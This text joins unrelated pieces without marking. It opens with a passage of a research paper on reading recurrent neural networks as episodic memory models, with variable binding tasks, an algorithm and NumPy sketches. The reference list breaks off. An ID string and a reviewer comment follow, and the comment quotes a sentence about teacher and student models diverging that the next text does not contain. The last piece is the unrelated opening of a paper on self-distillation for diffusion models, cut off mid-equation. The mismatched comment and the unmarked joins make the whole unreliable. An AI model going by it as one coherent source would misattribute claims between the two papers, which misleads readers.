**Mechanistic Interpretability:** Mechanistic interpretability seeks to reverse-engineer neural networks to expose the underlying mechanisms enabling them to learn and adapt to previously unencountered conditions. The prevailing strategy involves examining the networks' internal "circuits" (Conmy et al., 2023; Wang et al., 2022; Cammarata et al., 2020). Researchers have found that applying interpretability methods to large networks, such as transformers (Vaswani et al., 2017) handling complex tasks in natural language processing and vision, faces the challenge of unclear features to be modeled in internal circuits. To address this challenge, toy models are created with clearly defined features essential for task resolution. Probing models trained on toy tasks has resulted in supporting evidence for prevalent hypotheses. Some of the notable hypotheses are universality (Chughtai et al., 2023; Li et al., 2015b) - models learn similar features and circuits across different conditions when trained on similar tasks, bottleneck superposition (Elhage et al., 2022) - a mechanism for storing more information than the available dimensions, and composable linear representations (Cheung et al., 2019) - the use of linear spaces in feature representation.
Despite these advancements, current approaches remain confined to forward-only models like MLPs and transformers. Our proposed EMT generalizes the circuit approach of mechanistic interpretability to recurrent architectures and provides a mathematically grounded framework for deconstructing their behavior.

**Neural Memory Models:** Developments in memory modeling have revealed links between deep neural networks and memory models. The first investigation of this link explored how the different activation functions in Multi-Layer Perceptrons affected the learned representations and memory capacity (Krotov & Hopfield, 2016). Later studies extended this connection to explain the practical computational benefits observed in neural architectures like transformers (Ramsauer et al., 2020). Recently, the traditional memory models capable of associative recall of static memories were expanded to retrieving memory sequences (Karuvally et al., 2022; Chaudhry et al., 2023). This expansion allows memories that previously did not interact in the static memory retrieval context to interact and produce complex temporal behavior (Kleinfeld, 1986; Kleinfeld & Sompolinsky, 1988). A fundamental assumption in memory modeling (in both static and sequence retrieval) is that the network's memories are predetermined and stored in the synapses. This assumption limits the models' applicability to understanding symbolic binding of memories typically available only during inference. In EMT, we will demonstrate that by lifting the fixed memory assumption in memory modeling, these memory models can be utilized to build principled circuits to show how RNNs bind external information.

**Summary:** EMT reveals the synergistic relationship between the three fields - the dynamical systems interpretation of RNNs, mechanistic interpretability, and neural memory modeling - and suggests a unified approach to address the challenges of understanding neural behavior.

Figure 2: Circuit of variable binding in an illustrative task of four variables, each with five dimensions. A. The hidden state at time $t$ has subspaces capable of storing external information in their activities. The colors depict the vector components (or activity) of the hidden state in the variable memory basis. The linear operator $\Phi$ acts on the hidden state such that these activities are copied between variable memories, except for $\Psi_4$, which implements the linear operation $f$. B. The $N^{th}$ variable's contents are read during the output phase using the appropriate linear operator $W_r = \Psi_N$.

3 RNN as Episodic Memory

We show that RNNs can be viewed as a discrete-time analog of a memory model called the General Sequential Episodic Memory Model (GSEMM) (Karuvally et al., 2022); as a result, this view enables human interpretability in terms of learned memories and their interaction. See Appendix A.2 for the detailed proof. The sketch of the proof is detailed below. To be applicable for the more general setting of RNNs, we slightly modify the GSEMM synapse formulation to a pseudoinverse learning rule instead of the previous Hebbian rule. This modification allows the model to handle the more general case of linearly independent memory vectors, instead of orthogonal vectors only (Chaudhry et al., 2023; Personnaz et al., 1986). GSEMM is still a continuous-time memory, so we discretize it using the forward Euler approximation under the conditions that the timescale parameters of GSEMM are $T_f = 1$, $T_h = 0$, and $T_d = 0$.
The final discrete system we obtain is
$$V_f(t+1) = \Xi(I + \Phi^\top)\Xi^\dagger \sigma_f(V_f(t)),$$
where $V_f$ is a vector representing the state of the neural network, and $\Xi$ and $\Phi$ are matrices representing the stored memories and inter-memory interactions respectively. The columns of the $\Xi$ matrix are the static stored memories, and the matrix $\bar{\Phi}^\top \equiv I + \Phi^\top$ directs the chronology of these memories to form the sequences. The discrete system we derived is topologically conjugate to the update equations of an Elman RNN under the homeomorphic transformation $V_f = h$ if the norm of the matrix is bounded by 1. That is, if $\|\Xi \bar{\Phi}^\top \Xi^\dagger\| \leq 1$, we can consider a new state variable $h = \sigma_f(V_f)$ such that
$$h(t) = \sigma_f(\Xi \bar{\Phi}^\top \Xi^\dagger h(t-1)).$$
This conjugate system has equations that are equivalent to the hidden state update equation of an Elman RNN without bias, $h(t+1) = \sigma_f(W_{hh} h(t))$.

**Corollary 3.0.1** The learned synaptic interactions of autonomously evolving Elman RNNs without bias can be decomposed in terms of memory models ($W_{hh} = \Xi \bar{\Phi}^\top \Xi^\dagger$) and interpreted as the retrieval of memories temporally transitioning according to the rules encoded in the inter-memory interactions.

This corollary also generalizes to the case of forward-only networks, as they can be viewed as a single-step update of the RNN update equations. We now formulate the Episodic Memory Theory as follows: the Episodic Memory Theory (EMT) poses that the inner workings of learned neural networks can be revealed by analyzing the learned inter-memory interactions and their effect in the space of stored memories (Figure 1).

4 VARIABLE BINDING TASKS

Definition of Variable Binding: Variable binding in the context of RNNs refers to the network's ability to store and process pieces of input information symbolically across different timesteps, utilizing this information to generate the necessary outputs. For example, in a language translation task, variable binding involves storing the source sentence provided to the RNN as input in the hidden state, which will be referred to when generating the translated language. Directly analyzing the variable binding behavior of RNNs in complex tasks like language translation is very challenging because it is not clear what the variables will be. We thus take the approach of developing a class of toy variable binding tasks where the variables that need to be stored are well-understood. This approach is used in the mechanistic interpretation of forward-only neural networks (Chughtai et al., 2023; Li et al., 2015b), and RNNs (Maheswaranathan et al., 2019; Graves et al., 2014; Sussillo & Barak, 2013).

Algorithm 1: Approximating variable memories of trained linear RNNs
Require: tolerance $0 \leq \alpha \leq 1$; number of variables $s$; learned weights $W_{hh}$, $W_r$
  $\Psi_s \leftarrow W_r^\dagger$
  for $k \in \{s-1, s-2, \ldots, 1\}$ do
    $\Psi_k \leftarrow W_{hh}^{\,s-k} W_r^\dagger$
    $\Psi_k \leftarrow \Psi_k - EE^\dagger \Psi_k \quad \forall E : \lambda(E) < 1$ ▷ Remove the components along transient directions.
  end for
  $\Psi \leftarrow [\Psi_1; \ldots; \Psi_s]$
  $\Psi^\perp \leftarrow \mathrm{PC}(\{h(t)\} - \Psi \Psi^\dagger \{h(t)\})$ ▷ Principal components of $h$ from simulations.
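In NumPy, Algorithm 1 can be rendered roughly as follows. This is our sketch under the paper's linearity assumption: the function name is ours, the eigendecomposition-based projector is our concrete reading of the "transient directions" step, and the orthogonal complement $\Psi^\perp$ is omitted for brevity.

```python
import numpy as np

def variable_memories(W_hh, W_r, s, thresh=1.0):
    """Approximate variable memory bases Psi_1..Psi_s (Algorithm 1).

    W_hh: (n, n) learned recurrent weights of the linearized RNN.
    W_r:  (d, n) learned readout; Psi_s = pinv(W_r) spans the s-th memory.
    thresh: eigenvalue-magnitude cutoff (the alpha tolerance of Algorithm 1).
    """
    Psi_s = np.linalg.pinv(W_r)                       # (n, d)

    # Projector onto the transient directions: eigenvectors of W_hh whose
    # eigenvalue magnitude is below the threshold (these components decay).
    lam, V = np.linalg.eig(W_hh)
    E = V[:, np.abs(lam) < thresh]
    # Conjugate eigenvalue pairs are included together, so the projector is
    # real up to numerical error.
    P = (E @ np.linalg.pinv(E)).real if E.size else np.zeros_like(W_hh)

    bases = {s: Psi_s}
    for k in range(s - 1, 0, -1):
        Psi_k = np.linalg.matrix_power(W_hh, s - k) @ Psi_s
        bases[k] = Psi_k - P @ Psi_k                  # strip transient parts
    return [bases[k] for k in range(1, s + 1)]
```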
The variable binding tasks we consider are a generalization of the RepeatCopy task used by Keller et al. (2023) and Graves et al. (2014) to evaluate the memory storage capabilities of recurrent neural architectures. Our approach to interpreting the trained RNNs also generalizes the dynamical systems approach of Sussillo & Barak (2013) to the high-dimensional task spaces found in the variable binding tasks (see Appendix Figure 5 for the diversity and high-dimensional nature of the eigenvalue distribution found in the learned representation of the variable binding tasks). By taking the step to generalize existing simple setups, the variable binding tasks provide a path forward to close the gap between simple tasks and real-world scenarios, without sacrificing human interpretability.

Variable Binding Tasks: We define variable binding tasks as consisting of two phases: the input phase and the output phase. The input phase lasts for $s$ timesteps. During each timestep $t$ (where $1 \leq t \leq s$) of this phase, the RNN receives a $d$-dimensional input vector $u(t) = [u^1(t), u^2(t), \ldots, u^d(t)]^\top$. These vectors $u(t)$ provide the external information that the RNN is expected to store within its hidden state. It is important to note that the information necessary to compute the output at each timestep is cumulatively stored for use in subsequent steps. Once the input phase concludes at timestep $s$, the output phase begins immediately from timestep $s + 1$. During the output phase, the RNN no longer receives external input and instead operates autonomously, generating outputs based on the information stored during the input phase. The RNN should output the composition function
$$y(t) = f(y(t-1), y(t-2), \ldots, y(t-s)), \quad \text{for } t > s,$$
where $y(t)$ is initialized as $y(t) = u(t)$ for $0 < t \leq s$. This task setup implies that the RNN needs to use the accumulated information from the input phase to influence its outputs in the subsequent phase. For the purpose of our analysis in the paper, we define two constraints on the variable binding tasks: (1) the composition function $f$, which governs the output generation, is linear, and (2) the domain of $f$ (the set of possible input values) and the codomain of $f$ (the set of possible output values) are binary, consisting of values in $\{-1, 1\}$. These simplifications enable us to focus on how the RNN processes and integrates the input information across different timesteps to produce coherent outputs, abstracting out what the variables are actually storing.

5 VARIABLE BINDING CIRCUIT IN RNN

In this section, we develop a circuit to explain the mechanisms in RNNs that enable them to learn and generalize in the variable binding tasks. The circuit simplifies understanding the complex dynamics of these networks in a more analytically tractable and human-interpretable form. Our approach starts by considering RNNs in their linearized form, defined by specific linear equations involving the hidden state, input, and output. This simplification lays the foundation for further analysis. We propose changing the basis of the RNN's representation (both the hidden state and the learned synaptic interactions), to treat the linearized RNN as transitioning according to the sequential memory model of Section 3.

Table 1: RNNs consistently converge to the variable binding circuit: The top image shows the composition functions for the 4 tasks, visualized as a matrix with x-axis input and y-axis output.
Red color denotes +1, blue is -1, and no color is 0. $T_1$ is the function for a simple repeat copy task, while the rest are other general composition functions. The table shows the MAE in the complex argument between the eigenspectrum of the predicted $\Phi$ from the variable binding circuit and the empirically learned $W_{hh}$ in 4 tasks across 20 seeds under different RNN configurations. This average error is indeterminate (—) if the rank of the theoretical $\Phi$ differs from that of the empirical $W_{hh}$. Values in brackets show the average test accuracy of the trained model. For models that have high test accuracy (> 0.94), the error in the theoretically predicted spectrum is very low, indicating consistent convergence to the theoretical circuit. A notable exception to this behavior is $T_1$ with hidden size 64 and $L_2 = 0$, where the restricted availability of dimensions forces the network to encode variables in bottleneck superposition, resulting in a low-rank representation of the solution.

Linear RNN: We build our model of variable binding on a linearized RNN defined by the following equations:
$$h(t) = W_{hh}h(t-1) + W_{uh}u(t), \qquad y(t) = W_r h(t).$$
We envision that any non-linear RNN can be converted to this form by finding fixed points and subsequent linearization (see Appendix A.5 for details). Here, $W_{hh}$, $W_{uh}$, and $W_r$ are linear operators that are learned after training on the variable binding tasks. We will use the concept of variable memories to form principled hypotheses for these operators that will be validated by experimental results. $h(t)$ is the hidden state, $u(t)$ is the input, and $y(t)$ is the output. We use the simplifying assumption that $W_{hh}$ has sufficient capacity to represent all the variables required for the variable binding tasks. We further assume that $h(0)$ is the zero vector.

Variable Memory: We decompose the linear RNN using the GSEMM equivalence (Corollary 3.0.1) and define variable memories as subspaces of the space spanned by $\psi_\mu = \sum_i \xi_i^\mu e_i$. In the new basis, the hidden state vector is $h(t) = \sum_\mu h^\psi_\mu \psi_\mu$. The subspace spanned by the collection of vectors $\{\Psi_k\} = \{\psi_\mu : \mu \in \{(k-1)d + 1, \ldots, kd\}\}$ is called the $k^{th}$ variable memory. The activity of the subspace is the contents of the $k^{th}$ variable.

Figure 3: **EMT reveals latent neurons storing task-relevant information over time**: A. In the repeat copy task ($T_1$), the RNN needs to repeatedly produce an input sequence that is presented. A typical trained hidden state after providing the input does not show any meaningful patterns connected to the input. B. The same hidden states, when visualized in the variable memories, reveal the input information being stored as variables and processed according to the variable binding circuit. The actual hidden state is in a superposition of these latent variable memory activities.

Variable Memory Interactions (hypothesis): The variable binding tasks require mechanisms in $\Phi$ capable of retaining the task variables for $s$ timesteps. One possibility for this is the following linear operator $\Phi$, defined in terms of the variable memories:
$$\Phi = \sum_{\mu=1}^{(s-1)d} \psi_\mu \psi^{\mu+d} + \sum_{\mu=(s-1)d+1}^{sd} \sum_{\nu=1}^{sd} \Phi^\mu_\nu\, \psi_\mu \psi^\nu,$$
where $\psi^\mu$ denotes the dual basis of $\psi_\mu$, as in Equation 5. The action of the operator on the hidden state is illustrated in Figure 2A.
For all variable memories with index $i \in \{2, 3, 4, \ldots, s\}$, the variable contents (subspace activities) get copied to the variable memory with index $i - 1$. The operator then applies the function $f$ defined in Equation 2 on the variable contents and stores the result in the $s^{th}$ subspace. This circuit generalizes to any instantiation of the variable binding tasks with a linear composition function $f$.

Reading from Variable Memories (hypothesis): Once the RNN has performed its computation in the space of variable memories, the computed information needs to be extracted from the hidden state. The linear RNN has an operator $W_r$, which facilitates the reading of information from $h(t)$ at consecutive time steps. We propose that $W_r$ has the following form, which projects the activity of the $s^{th}$ subspace to the standard basis (Figure 2B) for output:
$$W_r = \sum_{\mu=(s-1)d+1}^{sd} e_{\mu-(s-1)d} \psi^\mu.$$

### 5.1 Result: RNNs Consistently Converge to the Variable Binding Circuit

To substantiate that the current hypothetical circuit is learned by empirical RNNs when trained on the variable binding tasks, we trained various RNN configurations, differing in hidden sizes and regularization penalties, on 4 variable binding tasks, each differing in the linear composition function $f$ (see top of Table 1). After training, the RNNs were linearized, and the eigenspectrum of the learned $W_{hh}$ matrix was compared with the theoretical $\Phi$, as defined in Equation 4. If RNNs learn a representation in alignment with our model, both operators, i.e., the learned $W_{hh}$ and the theoretical $\Phi$, are expected to share a portion of their eigenspectra, as they are similar matrices (i.e., they differ only by a basis change). We compared only the complex arguments of the spectrum, disregarding the magnitude. The rationale behind this exclusion lies in what the magnitude tells about the dynamical behavior. The eigenvalue magnitude portrays whether a linear dynamical system is diverging, converging, or maintaining consistency along the eigenvector directions (Strogatz, 1994). RNNs typically incorporate a squashing non-linearity, such as the Tanh activation function, which restricts trajectories that diverge to infinity. Essentially, provided the eigenvalue magnitude remains $\geq 1$, the complex argument solely determines the overall dynamical behavior of the RNN.

Figure 4: **EMT enables human interpretability of learned RNN parameters**: The learned weights, when visualized in the variable memories, result in a form that is human-interpretable. For RNNs trained on two sample tasks $T_1$ (A, left) and $T_2$ (B, right), the weight matrix $W_{hh}$ converts into a form that reveals the internal mechanisms of how RNNs solve the task. For both tasks, the variables with index < 8 copy their contents to the preceding variable. Variable 8 actively computes the function $f$ applied on all the variables stored in the hidden state using the variable binding circuit. For $T_1$, it is a simple copy of the 1st variable, and for $T_2$, it is a linear composition of all the variables. Notably, the circuit for $T_2$ shows an optimized basis where all the irrelevant dimensions are absent.

Table 1 depicts the average absolute error in the eigenspectrum and test accuracy when the RNN models are trained across 4 distinct variable binding tasks. The table shows that RNNs consistently converge to the hypothetical circuit.
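The spectrum comparison underlying Table 1 can be reproduced in a few lines. The sketch below is ours: it builds the block structure of the theoretical $\Phi$ of Equation 4 directly in the variable memory basis for a given composition matrix, and matches eigenvalues by sorted complex argument, which is our simplification of the comparison procedure.

```python
import numpy as np

def build_phi(F, d, s):
    """Theoretical transition operator Phi (Eq. 4) in the variable memory basis.

    F: (d, s*d) matrix of the linear composition f over the s stored variables.
    Variables 2..s are shifted down by one block; the last block computes f.
    """
    n = s * d
    Phi = np.zeros((n, n))
    Phi[: (s - 1) * d, d:] = np.eye((s - 1) * d)   # copy variable i -> i - 1
    Phi[(s - 1) * d :, :] = F                      # s-th block applies f
    return Phi

def spectrum_arg_error(W_hh, Phi):
    """MAE between sorted complex arguments of the two spectra, restricted to
    the persistent (|lambda| >= 1) part of W_hh's spectrum."""
    lam_w = np.linalg.eigvals(W_hh)
    lam_w = lam_w[np.abs(lam_w) >= 1.0]
    lam_p = np.linalg.eigvals(Phi)
    k = min(len(lam_w), len(lam_p))
    a_w = np.sort(np.angle(lam_w))[:k]
    a_p = np.sort(np.angle(lam_p))[:k]
    return np.abs(a_w - a_p).mean()

# RepeatCopy (T_1) with d = 5, s = 4: f copies variable 1 into block s,
# so Phi is a cyclic block shift and its eigenvalues are roots of unity.
d, s = 5, 4
F = np.hstack([np.eye(d)] + [np.zeros((d, d))] * (s - 1))
Phi = build_phi(F, d, s)
```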
6 **Practical Considerations of EMT**

Now we have sufficient evidence to show that the learned parameters of RNNs converge to our hypothetical circuit of Equation 4. We can now develop a procedure to explore empirical RNNs in terms of the variable memories. The RNN can then be interpreted using the variable binding circuit to deconstruct where the variable memories are stored and how they interact to produce the necessary outputs. Viewing the operations of the learned RNN interaction matrix $W_{hh}$ in the basis of variable memories has an additional benefit – it provides a path to influence or "fix" RNN behavior after training. This "fixing" operation can be imagined as changing the learned parameter $W_{hh}$ by influencing specific weights of the extracted $\Phi$. This can potentially be utilized to improve variable storage characteristics, fix problems computing the composition $f$, or even remove computations that are deemed unnecessary.

Building on the intuition from the linear model, we use the learned RNN weights $W_{hh}$ and $W_r$ to estimate the basis vectors of the variable memories. From our hypothesis on reading from variable memories (Equation 5), $\Psi_s = W_r^\dagger$ ($\dagger$ is the Moore-Penrose pseudoinverse) defines a matrix whose columns are the basis vectors of the $s^{th}$ variable memory. Similarly, other basis vectors can be found as columns of the matrices obtained by propagating these dimensions forward in time: $\Psi_k = \Phi^{s-k}\Psi_s = W_{hh}^{s-k}W_r^\dagger$. Although the variable memories are defined based on a linear evolution assumption, we found that the method of power iterating $W_{hh}$ was effective in defining the variable memories even for non-linear Elman RNNs. For completeness, we characterize RNN behavior not currently explainable by the variable binding circuit using a space orthogonal to the variable memories ($\Psi^\perp$). The pseudo-code for the algorithm to approximate variable memories from a linearized RNN is summarized in Algorithm 1. A formal analysis of the correctness of the approximation is in Appendix A.6.

6.1 Result: Variable Memory Reveals Variable Binding Latent Neurons

We approximated the variable memories of RNNs trained on the Repeat Copy task ($T_1$) using the algorithm and visualized the hidden state. In the Repeat Copy task, the RNN must repeatedly output the stream of inputs provided during the input phase. The simulated hidden states of learned RNNs are visualized by projecting the hidden state onto the variable memories: $\hat{h} = \Psi \Psi^\dagger h$. The results shown in Figure 3 reveal that the hidden state is in a superposition (or distributed representation) of latent neurons that actively store each variable required to compute the function $f$ at all points in time. The basis transformation helps to disentangle these superposed (or distributed) variables from the hidden state so that they are easily visualized.

6.2 Result: Variable Memories Enable Human Interpretability of Learned Weights

In addition to revealing hidden neurons that store and process information over time, variable memories can also be used as bases to view the function of the learned matrices. The variable memories are carefully constructed such that $W_{hh}$ converts to the underlying $\Phi$ when viewed in the basis, and any behavior not explainable by $\Phi$ is shown as interactions with the orthogonal space. Figure 4 shows the learned parameters of $W_{hh}$ encoding the variable binding circuit.
The low connectivity (near-zero magnitude in the interactions) between the variable memories and the orthogonal space indicates that the variable binding circuit fully explains the behavior of the RNNs.

7 Discussion

In this work, we frame Recurrent Neural Networks as discrete-time analogs of the General Sequential Episodic Memory Model – an energy-based memory model from computational neuroscience. We introduced the concept of "variable memories," linear subspaces capable of symbolically binding and recursively composing information, providing a path forward to lift the fixed memory assumption of the memory model and promoting applicability in mechanistic understanding. The variable memory approach addresses some of the limitations of current methods in understanding RNNs, particularly the intractability of Jacobian spectral analysis in high-dimensional task spaces. We presented a new class of algorithmic tasks that are designed to probe the variable binding behavior by generalizing existing simple tasks, taking a step to close the gap between toy tasks and real-world tasks without compromising on human interpretability. We presented a circuit mechanism that is capable of recursively storing and composing variables and showed empirical evidence that trained RNNs consistently converge to this circuit, indicating computational universality in the learned representation and behavior of models. Building on this evidence, we used variable memories to define a privileged basis from trained RNN parameters that revealed latent neurons actively involved in information processing. Further, using variable memories, we viewed the learned parameters of an RNN in a human-interpretable manner, enabling reasoning about and understanding RNN behavior as repeatedly shifting and composing variables. Using the tools from the theory, we fully deconstructed both the hidden state behavior and the learned parameters of empirically trained RNNs.

Limitations: With these results, it is also important to recognize inherent limitations to the variable memory approach. One of the limitations is that the analysis we presented is primarily restricted to linear dynamical systems. Although an accurate representation of the qualitative behavior within small neighborhoods of fixed points can be found for non-linear dynamical systems, the RNNs have to be confined to these linear regions for the approach to be applicable. It is still an interesting behavior that models consistently converge to this linearized regime, at least for the tasks outlined in Section 4. Outside the linear regions, RNNs may also exhibit behaviors like ergodicity and chaos, which the current analysis cannot support. The second limitation of the approach is that external information is stored as a linear superposition of variable memories in the hidden state. Our results indicate that the role of non-linearity in encoding external information may be minimal for the toy tasks. However, we have observed that when the number of dimensions of the linear operator $W_{hh}$ is not substantially large compared to the task's dimensionality requirements (bottleneck superposition) or when the regularization penalty is high, the RNN can effectively resort to non-linear encoding mechanisms to store external information (Appendix B.3).
Overcoming these limitations of non-linearity will be an interesting direction to pursue in future research, and will bring the concept of variable memories closer to addressing the challenges posed by the quest to understand neural computation.

8 Reproducibility Statement

We have taken steps to ensure the reproducibility of the theoretical and empirical contributions of the paper. The main contributions of the paper include: (1) the theoretical connection between RNNs and sequence memory models, (2) the creation of toy models to test variable binding in RNNs, (3) a mathematical model of variable binding, and (4) an algorithm to compute variable memories for RNN interpretability. For (1), we summarize the high-level ideas of the proof in the main document in Section 3 and provide detailed steps in Appendix A.2. For (2), we provided a mathematical description in Section 4, where the final paragraph details the assumptions we consider in the paper. For (3), we detail the mathematical model in Section 5; the assumptions of linearity and sufficient rank are stated in the section. Further, we have provided two fully worked examples in Appendix A.4. For the theoretical component of (4), we have stated the algorithm in Algorithm 1 and explained how the algorithm was formulated in Section 6. For the empirical component of (4), we have detailed the empirical procedure for creating data in Appendix B.1 and training the models in Appendix B.2. We also provide Jupyter notebooks and custom Python libraries that were used to create the plots and tables in the supplementary materials.

References

A. Alishahi, Grzegorz Chrupala, and Tal Linzen. Analyzing and interpreting neural networks for NLP: A report on the first BlackboxNLP workshop. Natural Language Engineering, 25:543–557, 2019. URL https://api.semanticscholar.org/CorpusID:102350595.

Nick Bostrom. Superintelligence: Paths, dangers, strategies. 2014. URL https://api.semanticscholar.org/CorpusID:106762840.

Vanessa Buhrmester, David Münch, and Michael Arens. Analysis of explainers of black box deep neural networks for computer vision: A survey. ArXiv, abs/1911.12116, 2019. URL https://api.semanticscholar.org/CorpusID:208309956.

Nick Cammarata, Shan Carter, Gabriel Goh, Chris Olah, Michael Petrov, Ludwig Schubert, Chelsea Voss, Ben Egan, and Swee Kiat Lim. Thread: Circuits. Distill, 2020. doi: 10.23915/distill.00024. https://distill.pub/2020/circuits.

Hamza Tahir Chaudhry, Jacob A. Zavatone-Veth, Dmitry Krotov, and Cengiz Pehlevan. Long sequence Hopfield memory. ArXiv, abs/2306.04532, 2023. URL https://api.semanticscholar.org/CorpusID:259095470.

Z. Che, S. Purushotham, K. Cho, D. Sontag, and Y. Liu. Recurrent neural networks for multivariate time series with missing values. Scientific Reports, 8, 2018. doi: 10.1038/s41598-018-24271-9.

Brian Cheung, Alex Terekhov, Yubei Chen, Pulkit Agrawal, and Bruno A. Olshausen. Superposition of many models into one. ArXiv, abs/1902.05522, 2019. URL https://api.semanticscholar.org/CorpusID:61153603.

Brian R. Christian. The alignment problem: Machine learning and human values. Perspectives on Science and Christian Faith, 2021. URL https://api.semanticscholar.org/CorpusID:253505740.

Bilal Chughtai, Lawrence Chan, and Neel Nanda. A toy model of universality: Reverse engineering how networks learn group operations.
In Andreas Krause, Emma Brunskill, Kyunghyun Cho, Barbara Engelhardt, Sivan Sabato, and Jonathan Scarlett (eds.), Proceedings of the 40th International Conference on Machine Learning, volume 202 of Proceedings of Machine Learning Research, pp. 6243–6267. PMLR, 23–29 Jul 2023. URL https://proceedings.mlr.press/v202/chughtai23a.html.
QKqWnNkwPL
I am not sure that this statement in introduction (second paragraph) about the current distillation techniques is true — “The student is trained to mimic the teacher, but in fewer iterations, so that, eventually the teacher and the student diverge during training.” In my experience with distillation techniques, I haven’t seen that student and teacher diverge in the cases when distillation is successful. Could the authors elaborate on what they mean by “diverge” here?
SELF-DISTILLATION FOR DIFFUSION

Anonymous authors
Paper under double-blind review

ABSTRACT

In recent years, diffusion models have demonstrated powerful generative capabilities. As they continue to grow in both ability and complexity, performance optimization becomes more relevant. Knowledge Distillation (KD), where the output from a pre-trained teacher model is used to train a smaller student model, has been shown to greatly reduce the number of network evaluations required, while retaining comparable image sample quality. KD is especially useful in diffusion, because it can be used not only to distill a large model into a small one, but also to distill a large number of denoising iterations into a small one. Here, we show that a form of self-distillation—training a subnetwork to mimic the output of the larger network, effectively distilling a network into itself—can improve distillation in diffusion models. We show first that when a pre-trained teacher model is distilled to a student network, we can turn this into a self-distillation procedure by unifying the teacher and the student. Our results indicate that this leads to faster convergence for a competitive sample quality. Additionally, we show in small-scale experiments that when diffusion models are trained from scratch, adding a self-distillation term to the loss can, in specific cases, help the model to converge, producing high-quality samples more quickly.

1 INTRODUCTION

A major drawback of image-generating diffusion models (Sohl-Dickstein et al., 2015; Song & Ermon, 2019) is the gradual denoising process, at times requiring up to 1000 denoising steps in order to produce results which are visually pleasing and/or acceptable interpretations of the desired final outcome (Sohl-Dickstein et al., 2015; Ho et al., 2020). Optimizations, such as training on latent image representations and using implicit scheduling, known as denoising diffusion implicit models (DDIM), have reduced the number of steps needed to generate decent samples to the range of 20-50 (Song et al., 2021). Despite these advances, diffusion models still require substantially more computational resources at inference time than Generative Adversarial Networks (GANs), whose execution is comparable in complexity to a single iteration of a diffusion model (Sohl-Dickstein et al., 2015; Ho et al., 2020).

Recently, Knowledge Distillation (KD) techniques have proven effective in further reducing the required DDIM steps, in some cases even achieving good results in a single forward pass (Salimans & Ho, 2022; Meng et al., 2023; Luhman & Luhman, 2021). Current distillation techniques for diffusion models involve a form of teacher/student distillation, where an original pre-trained model is frozen to be used as a teacher, and a copy of it is used as a student model. The student is trained to mimic the teacher, but in fewer iterations, so that in time the student converges to replicate the teacher's sample quality at fewer sampling steps. Either the student's single DDIM step is directly compared against the teacher's final output (Luhman & Luhman, 2021), which involves a slow training process requiring many evaluations per parameter update, or the student's single-step output is compared against two steps of the teacher model, progressively reducing the total DDIM steps in halves (Salimans & Ho, 2022). This results in three steps being taken per update of the student's weights (Salimans & Ho, 2022; Meng et al., 2023).
For both of these existing methods, the teacher model's parameters remain static during each iteration, providing the same quality of information for the student to absorb (Song et al., 2021).

A different approach to distillation is self-distillation (Zhang et al., 2022; 2019), where during training, a model (like a CNN or a single-stack LLM) is given two outputs: one from all layers in the model, and one from only the first $k$ layers. Then, as the model trains on a standard loss, an additional loss term is added to induce the second output to mimic the first. The idea is that whatever the whole network has learned is distilled into the lower layers, freeing up the higher layers. In this setting there is no need for a two-phase training: as soon as the network as a whole learns something, it is immediately distilled into the subnetwork.

We propose to apply self-distillation to diffusion models, resulting in what we term direct self-distillation (DSD). In DSD, we do not separate the teacher and student models and instead, in the spirit of self-distillation, distill a model into itself during training. Specifically, we train sequentially, taking a full DDIM sample from the model. Every two steps of sampling yield intermediate samples $z_{t-1}$ and $z_{t-2}$; we then take the current prediction for the fully denoised final sampling step, $x_0(z_{t-1})$, with the subsequent step's predicted $x_0(z_{t-2})$ as a target, and minimize the squared distance between them (computing gradients only over the prediction).

Compared to existing methods, there are three key differences. First, we distill the model into itself, instead of keeping the teacher and student separate. Second, we do not use training data, relying only on samples from the model itself. This simplifies training, removing data loading from the process entirely. Finally, we train sequentially: we perform a distillation step for every other iteration of a full sample. This contrasts with previous methods, where a random point along the sampling trajectory is chosen for each distillation step. The result is a diffusion model that directly generates high-quality output in a low number of steps.

We show that a large diffusion model (specifically, a pretrained conditional ImageNet 256x256 model with ~400M parameters, as well as pretrained LSUN Bedroom and CelebA unconditional models with ~274M parameters each, at 128x128 and 256x256 resolutions respectively) can be distilled down to two iterations using DSD. Similarly, we follow the experiments from Yang et al. and show that if the teacher/student distillation used there is replaced by DSD, competitive results may be achieved with as much as an order of magnitude fewer parameter updates. Then, to test whether, in principle at least, self-distillation may be applied when training a model from scratch, we introduce a version of DSD for this purpose and show that it performs well on small-scale image generation tasks. Taken together with our other results, this suggests that when training image diffusion models at scale, self-distillation may help reduce the number of iterations required as part of training, with no need for a two-stage process.

2 RELATED WORK Diffusion models were introduced in Sohl-Dickstein et al. (2015) and shown to perform at scale in Ho et al. (2020). Despite advances like DDIMs (Song et al., 2021) that reduce the number of iterations required, sampling time remains one of the main bottlenecks.
Knowledge distillation (Buciluă et al., 2006; Hinton et al., 2015; Gou et al., 2021) is a promising approach to reduce the required iterations to (close to) 1. This was first done by Luhman & Luhman (2021), distilling directly into a single network using fully denoised images as targets. Salimans & Ho (2022) introduced Progressive Distillation, showing that gradually reducing the number of steps taken by both the teacher and the student, while introducing intermediate denoised images as targets, leads to better results and improved efficiency. Meng et al. (2023) extended this approach to conditional diffusion models.

One application of knowledge distillation is that large networks may be distilled into smaller networks with relatively little loss of performance (Sanh et al.). This leads naturally to the idea of self-distillation (Zhang et al., 2021), where the output of a large network is distilled into a subnetwork during training. This often improves performance at very little extra computational cost. Self-distillation has successfully been applied in contexts such as graph learning (Li et al., 2021), object detection (Zheng et al., 2020), and regularizing classification (Yun et al., 2020).

---
1 The phrase self-distillation is also used to refer to teacher/student distillation with identical architectures. Here, it only refers to the method described, where the student is in some sense a sub-network of the teacher.
2 Resource limitations preclude us from testing this approach on the scale of state-of-the-art models.

A related, but distinct, approach is to use a trained model to generate several outputs, and to combine these into a superior training label on which the whole model is then refined. This may be referred to as self-training in large language models (Huang et al., 2022) and as a policy-improvement operator in reinforcement learning (Sutton & Barto, 2018; Silver et al., 2017).

3 PROGRESSIVE DISTILLATION (PD)

Progressive Distillation (PD) aims to retain sampling quality whilst progressively halving the DDIM steps taken. This method iteratively refines a diffusion model by reducing the number of sampling steps, utilizing a teacher-student dynamic. The process commences with a standard-trained teacher diffusion model, which then imparts its characteristics to a student model. In each iteration of PD, the student model is initialized as a clone of the teacher model, inheriting both parameters and model definition. The training involves sampling from a data-set, adding noise to form a noisy sample $z_t$, and then applying the student model to this data. Unlike conventional training, the PD approach modifies the target for the denoising task. Instead of the original data $x$, the student model denoises towards a newly defined target $\tilde{x}$, calculated as:

$$\tilde{x}(z_t) = 2 \text{ DDIM steps with the teacher model from } z_t \text{ to } z_{t-1/N},$$

